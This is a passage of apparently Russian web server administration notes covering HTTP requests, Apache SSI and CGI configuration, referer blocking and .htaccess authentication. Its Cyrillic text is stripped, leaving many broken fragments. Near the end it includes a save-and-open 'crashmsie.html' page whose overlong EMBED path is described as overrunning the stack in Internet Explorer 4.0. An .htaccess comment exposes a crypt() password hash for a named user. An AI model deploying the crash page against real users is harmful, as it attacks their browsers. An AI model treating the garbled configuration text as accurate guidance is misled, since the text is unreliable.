tcp www.host.com
( 80)
GET /local/url/file/name.html HTTP/1.0
Host: www.host.com
Http_referer: url_____
,
, .
, GET
. . .
^M^J - - -
:
http-
^M^J -
as is
:
$ telnet www 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.html HTTP/1.0
Enter
HTTP/1.1 ?
"Range: bytes nnn-".
206 - " "
.
, 200
.
SSI - Server Side Includes
, www.apache.org
0. SSI- Last-modified,
XBitHack full
chmod g+x file.shtml
1. SSI ,
:
/etc/httpd/conf/access.conf :------------------------
# ""
Options +Includes # Options All
/etc/httpd/conf/srm.conf :------------------------
AddType text/html .shtml
AddHandler server-parsed .shtml
2. SSI .shtml
:
charset=
The value will often be enclosed in double quotes; many com
mands only allow a single attribute-value pair.
The allowed ELEMENTS are:
config -
config
errmsg - ,
sizefmt -
timefmt -
var -
exec - shell CGI-
cgi - (%-encoded) URL relative path to the CGI script.
cmd - shell
fsize -
file -
virtual -(%-encoded) URL-path relative
flastmod -
include -
file -
virtual - URL -
Include variables
These are available for the echo command, and to any program
invoked by the document.
DATE_GMT
The current date in Greenwich Mean Time.
DATE_LOCAL
The current date in the local time zone.
DOCUMENT_NAME
The filename (excluding directories) of the document requested
by the user.
DOCUMENT_URI
The (%-decoded) URL path of the document requested by the user.
Note that in the case of nested
include files, this is not then URL for the current document.
LAST_MODIFIED
The last modification date of the document requested by the user.
If server side includes are enabled, you will see data values below:
The date is:
The current version of the server
The CGI gateway version
The server name
This file is called:
This file's URI
The query string
This file was last modified:
The size of the unprocessed file
sample.html was last modified
You are using
You came from
# SSI perl-cgi
if (//) {
print $`;$tmp = $';
open (INC,"$inc") || die "Can't Open $inc: $!\n";
while () {
if (//) {
@time = localtime ( time() ); $time[4]++;
if ($time[4] < 10) { $time[4] = "0" . "$time[4]"; }
s//$time[3].$time[4].$time[5]/g;
}
print $_;
}
close(INC);
print "$tmp";
}
httpd.conf
SetEnvIfNoCase Referer rusf\.ru internal_referer
SetEnvIfNoCase User-Agent Teleport internal_referer
SetEnvIfNoCase User-Agent Vampire internal_referer
SetEnvIfNoCase User-Agent ReGet internal_referer
SetEnvIfNoCase User-Agent GetRight internal_referer
SetEnvIfNoCase User-Agent Wget internal_referer
ErrorDocument 403 http://rusf.ru/books/index.htm
order deny,allow
deny from all
allow from env=internal_referer
# No offline browsers robots.txt
User-Agent: DISCo Pump, Wget, WebZIP, Teleport Pro, WebSnake, Offline
Explorer, Web-By-Mail
Disallow: /
, "cl"
http://hoohoo.ncsa.uiuc.edu/file.html#cl
Request for a CGI script with no extra path information and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi
Request for a script with extra path information, and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path
Request for a script with no extra path information, and an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?query
Request for a script with extra path information as well as an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path?a+query
, 0,1,1 2 :
extra path - " ",
query - "?"
extra path image map -
query ISINDEX
CGI- :
.
REMOTE_ADDR=127.0.0.1
REMOTE_HOST=localhost
HTTP_REFERER=http://www.ac.msk.su:80/cgi-bin/html-KOI?KSP/bachurin.txt
REQUEST_METHOD=GET
QUERY_STRING=query
PATH_INFO=/marshrut
PATH_TRANSLATED=/home/httpd/docs/marshrut
SCRIPT_NAME=/cgi-bin/proba
HTTP_USER_AGENT=NCSA Mosaic for the X Window System/2.4 libwww/2.12 modified
checkbox':
# ISINDEX - CGI $1
# METHOD=GET -
# QUERY_STRING
# http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?button1=on&button2=off
# POST, PUT.
. cgi- .
CONTENT_LENGTH
- CONTENT_TYPE
FORM ACTION="http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi" METHOD="POST"
:
Status: 200 OK
Status: 404 File not found
Content-type: text/html
, -
, , :
Location: /path/doc.txt
Location: gopher://gopher.ncsa.uiuc.edu/
-
, :
--- start of output ---
HTTP/1.0 200 OK
Date: Tuesday, 26-Dec-95 15:17:10 GMT
Server: NCSA/1.3
MIME-version: 1.0
Content-type: text/html
Last-modified: Tuesday, 24-Dec-95 15:15:41 GMT
Content-length: 3132
This is a plaintext document generated on the fly just for you.
--- end of output ---
$SERVER_PROTOCOL $SERVER_SOFTWARE
MSIE 4.0. 4.01 can be crashed with a little help of the < EMBED > tag.
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0. the long file extension causes stack overrun.
--------cut here and save as crashmsie.html---------------------
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40
80 160 170 180 190 200
</HTML>
---------------------------------------------------------------
.htaccess
order deny,allow
deny from all
allow from polimos.ras.ru localhost
Order deny,all
Allow from .abc.ru
Deny from all
Satisfy any
AuthType Basic
AuthName lenta.ru
AuthUserFile /home/www/passwd
# moshkow:1HrhNpfYnwTau crypt()
require valid-user
__
, -
http://koshelev.ru/cgi-bin/bannerOver
204 No Content - .. _ _
.
,
- .